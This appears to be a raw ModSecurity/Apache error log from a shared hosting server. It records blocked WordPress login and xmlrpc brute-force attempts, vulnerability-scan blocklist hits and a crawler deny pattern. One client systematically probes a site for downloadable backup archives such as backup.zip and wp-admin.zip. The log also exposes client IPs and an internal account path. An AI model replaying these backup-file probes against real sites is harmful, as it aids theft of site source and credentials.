[Tue May 26 18:11:53.410822 2026] [security2:error] [pid 973439:tid 973670] [client 156.59.198.136:37372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "omshriinfrastructures.com"] [uri "/images/EMI.pdf"] [unique_id "ahWVEQBg9mKRpdEFs3BtdQAAAGU"]
[Tue May 26 18:11:55.591175 2026] [security2:error] [pid 973439:tid 973615] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVEwBg9mKRpdEFs3BtmwAAAC4"]
[Tue May 26 18:11:56.029095 2026] [security2:error] [pid 973439:tid 973488] [remote 103.91.67.202:41960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVEwBg9mKRpdEFs3BttQAAOzA"]
[Tue May 26 18:11:56.528793 2026] [security2:error] [pid 973439:tid 973496] [remote 103.91.67.202:41960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVFABg9mKRpdEFs3BtwgAANzg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:11:56.915850 2026] [security2:error] [pid 973439:tid 973485] [remote 167.172.25.98:48374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVFABg9mKRpdEFs3BtxwAADC0"]
[Tue May 26 18:11:57.940955 2026] [security2:error] [pid 973439:tid 973626] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVFQBg9mKRpdEFs3Bt2AAAADk"]
[Tue May 26 18:11:58.778375 2026] [security2:error] [pid 973439:tid 973497] [remote 47.128.60.224:56054] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/about-us/index.html"] [unique_id "ahWVFgBg9mKRpdEFs3BuAQAACjk"]
[Tue May 26 18:11:59.211457 2026] [security2:error] [pid 973439:tid 973504] [remote 216.73.217.110:30461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahWVFwBg9mKRpdEFs3BuEQAAWUA"]
[Tue May 26 18:11:59.318988 2026] [security2:error] [pid 973439:tid 973513] [remote 92.53.96.243:39328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.96.53.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWVFwBg9mKRpdEFs3BuDQAATUk"]
[Tue May 26 18:11:59.736569 2026] [security2:error] [pid 973439:tid 973499] [remote 92.53.96.243:39328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.96.53.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWVFwBg9mKRpdEFs3BuGwAAQjs"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:12:00.636363 2026] [security2:error] [pid 973439:tid 973605] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVFwBg9mKRpdEFs3BuJAAAACQ"]
[Tue May 26 18:12:02.460267 2026] [security2:error] [pid 973439:tid 973585] [client 82.76.238.33:49290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVGgBg9mKRpdEFs3BuaQAAABA"]
[Tue May 26 18:12:02.462531 2026] [security2:error] [pid 973439:tid 973585] [client 82.76.238.33:49290] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVGgBg9mKRpdEFs3BuaQAAABA"]
[Tue May 26 18:12:02.899312 2026] [security2:error] [pid 973439:tid 973533] [remote 45.32.67.165:33182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWVGgBg9mKRpdEFs3BucwAAO10"]
[Tue May 26 18:12:03.176225 2026] [security2:error] [pid 973439:tid 973569] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVGgBg9mKRpdEFs3BubQAAAAA"]
[Tue May 26 18:12:05.475269 2026] [security2:error] [pid 973439:tid 973509] [remote 54.38.29.86:56094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVHQBg9mKRpdEFs3BurgAAeEU"]
[Tue May 26 18:12:05.812847 2026] [security2:error] [pid 973439:tid 973630] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVHQBg9mKRpdEFs3BurQAAAD0"]
[Tue May 26 18:12:06.653747 2026] [security2:error] [pid 973439:tid 973517] [remote 193.42.61.12:54000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWVHgBg9mKRpdEFs3BuzgAALE0"]
[Tue May 26 18:12:07.062964 2026] [security2:error] [pid 973439:tid 973597] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVHgBg9mKRpdEFs3Bu3AAAABw"]
[Tue May 26 18:12:07.301836 2026] [security2:error] [pid 973439:tid 973523] [remote 54.38.29.86:56094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVHwBg9mKRpdEFs3Bu5AAAS1M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:12:07.830741 2026] [security2:error] [pid 973439:tid 973625] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVHwBg9mKRpdEFs3Bu9gAAADg"], referer: http://cagmedya.com/yedek.zip
[Tue May 26 18:12:08.097969 2026] [security2:error] [pid 973439:tid 973647] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVHwBg9mKRpdEFs3Bu-wAAAE4"]
[Tue May 26 18:12:08.119436 2026] [security2:error] [pid 973439:tid 973609] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVHwBg9mKRpdEFs3Bu6gAAACg"]
[Tue May 26 18:12:08.368418 2026] [security2:error] [pid 973439:tid 973674] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIABg9mKRpdEFs3BvAQAAAGk"], referer: http://cagmedya.com/backup.zip
[Tue May 26 18:12:08.639267 2026] [security2:error] [pid 973439:tid 973607] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIABg9mKRpdEFs3BvAwAAACY"]
[Tue May 26 18:12:08.922465 2026] [security2:error] [pid 973439:tid 973654] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIABg9mKRpdEFs3BvCgAAAFU"], referer: http://cagmedya.com/wp-admin.zip
[Tue May 26 18:12:09.210768 2026] [security2:error] [pid 973439:tid 973650] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIQBg9mKRpdEFs3BvDwAAAFE"]
[Tue May 26 18:12:09.490093 2026] [security2:error] [pid 973439:tid 973652] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIQBg9mKRpdEFs3BvHAAAAFM"], referer: http://cagmedya.com/admin.zip
[Tue May 26 18:12:09.764539 2026] [security2:error] [pid 973439:tid 973688] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIQBg9mKRpdEFs3BvIwAAAHc"]
[Tue May 26 18:12:10.036433 2026] [security2:error] [pid 973439:tid 973635] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIQBg9mKRpdEFs3BvLQAAAEI"], referer: http://cagmedya.com/httpdocs.zip
[Tue May 26 18:12:10.301371 2026] [security2:error] [pid 973439:tid 973647] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIgBg9mKRpdEFs3BvNAAAAE4"]
[Tue May 26 18:12:10.461255 2026] [security2:error] [pid 973439:tid 973625] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVIQBg9mKRpdEFs3BvLAAAADg"]
[Tue May 26 18:12:10.567776 2026] [security2:error] [pid 973439:tid 973661] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIgBg9mKRpdEFs3BvOwAAAFw"], referer: http://cagmedya.com/cgi-bin.zip
[Tue May 26 18:12:10.842263 2026] [security2:error] [pid 973439:tid 973665] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIgBg9mKRpdEFs3BvQAAAAGA"]
[Tue May 26 18:12:11.111400 2026] [security2:error] [pid 973439:tid 973667] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIwBg9mKRpdEFs3BvRQAAAGI"], referer: http://cagmedya.com/.well-known.zip
[Tue May 26 18:12:11.585978 2026] [security2:error] [pid 973439:tid 973617] [client 82.76.238.33:50025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVIwBg9mKRpdEFs3BvXgAAADA"]
[Tue May 26 18:12:11.586106 2026] [security2:error] [pid 973439:tid 973617] [client 82.76.238.33:50025] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVIwBg9mKRpdEFs3BvXgAAADA"]
[Tue May 26 18:12:11.657567 2026] [security2:error] [pid 973439:tid 973579] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIwBg9mKRpdEFs3BvUAAAAAo"]
[Tue May 26 18:12:11.945704 2026] [security2:error] [pid 973439:tid 973679] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVIwBg9mKRpdEFs3BvYgAAAG4"], referer: http://cagmedya.com/administrator.zip
[Tue May 26 18:12:12.229903 2026] [security2:error] [pid 973439:tid 973657] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJABg9mKRpdEFs3BvbQAAAFg"]
[Tue May 26 18:12:12.504556 2026] [security2:error] [pid 973439:tid 973690] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJABg9mKRpdEFs3BvdQAAAHk"], referer: http://cagmedya.com/respaldo.zip
[Tue May 26 18:12:12.775064 2026] [security2:error] [pid 973439:tid 973627] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJABg9mKRpdEFs3BvegAAADo"]
[Tue May 26 18:12:13.043435 2026] [security2:error] [pid 973439:tid 973693] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJABg9mKRpdEFs3BvhQAAAHw"], referer: http://cagmedya.com/sauvegarde.zip
[Tue May 26 18:12:13.319435 2026] [security2:error] [pid 973439:tid 973621] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJQBg9mKRpdEFs3BvjgAAADQ"]
[Tue May 26 18:12:13.568009 2026] [security2:error] [pid 973439:tid 973682] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVJABg9mKRpdEFs3BvgQAAAHE"]
[Tue May 26 18:12:13.585981 2026] [security2:error] [pid 973439:tid 973680] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJQBg9mKRpdEFs3BvlgAAAG8"], referer: http://cagmedya.com/sicherung.zip
[Tue May 26 18:12:13.856984 2026] [security2:error] [pid 973439:tid 973664] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJQBg9mKRpdEFs3BvmwAAAF8"]
[Tue May 26 18:12:14.135346 2026] [security2:error] [pid 973439:tid 973608] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJgBg9mKRpdEFs3BvowAAACc"], referer: http://cagmedya.com/archive.zip
[Tue May 26 18:12:14.399138 2026] [security2:error] [pid 973439:tid 973620] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJgBg9mKRpdEFs3BvqwAAADM"]
[Tue May 26 18:12:14.669031 2026] [security2:error] [pid 973439:tid 973670] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJgBg9mKRpdEFs3BvtgAAAGU"], referer: http://cagmedya.com/cagmedya.com.zip
[Tue May 26 18:12:14.937108 2026] [security2:error] [pid 973439:tid 973575] [client 209.99.189.168:65491] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJgBg9mKRpdEFs3BvvAAAAAY"]
[Tue May 26 18:12:15.211279 2026] [security2:error] [pid 973439:tid 973693] [client 209.99.189.168:65529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWVJwBg9mKRpdEFs3BvvQAAAHw"], referer: http://cagmedya.com/cagmedya.zip
[Tue May 26 18:12:15.958154 2026] [security2:error] [pid 973439:tid 973586] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVJwBg9mKRpdEFs3BvywAAABE"]
[Tue May 26 18:12:17.197274 2026] [security2:error] [pid 973439:tid 973443] [remote 74.7.241.58:43516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWVKQBg9mKRpdEFs3Bv9wAAVQM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 18:12:19.734807 2026] [security2:error] [pid 973439:tid 973607] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVKgBg9mKRpdEFs3BwDwAAACY"]
[Tue May 26 18:12:20.842496 2026] [security2:error] [pid 973439:tid 973611] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVLABg9mKRpdEFs3BwOgAAACo"]
[Tue May 26 18:12:20.970850 2026] [security2:error] [pid 973439:tid 973588] [client 181.177.89.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVLABg9mKRpdEFs3BwUAAAABM"], referer: https://www.anujtradingco.com/
[Tue May 26 18:12:21.998268 2026] [security2:error] [pid 973439:tid 973623] [client 181.177.89.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVLQBg9mKRpdEFs3BwZgAAADY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 18:12:22.992377 2026] [security2:error] [pid 973439:tid 973646] [client 82.76.238.33:50492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVLgBg9mKRpdEFs3BwhwAAAE0"]
[Tue May 26 18:12:22.992560 2026] [security2:error] [pid 973439:tid 973646] [client 82.76.238.33:50492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVLgBg9mKRpdEFs3BwhwAAAE0"]
[Tue May 26 18:12:23.906470 2026] [security2:error] [pid 973439:tid 973594] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVLwBg9mKRpdEFs3BwkgAAABk"]
[Tue May 26 18:12:24.842300 2026] [security2:error] [pid 973439:tid 973693] [client 147.53.122.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVMABg9mKRpdEFs3BwwgAAAHw"], referer: https://www.anujtradingco.com/
[Tue May 26 18:12:24.853495 2026] [security2:error] [pid 973439:tid 973685] [client 181.177.89.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVMABg9mKRpdEFs3BwwwAAAHQ"], referer: https://anujtradingco.com
[Tue May 26 18:12:25.946230 2026] [security2:error] [pid 973439:tid 973670] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVMQBg9mKRpdEFs3BwzgAAAGU"]
[Tue May 26 18:12:26.390420 2026] [core:crit] [pid 973439:tid 973689] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
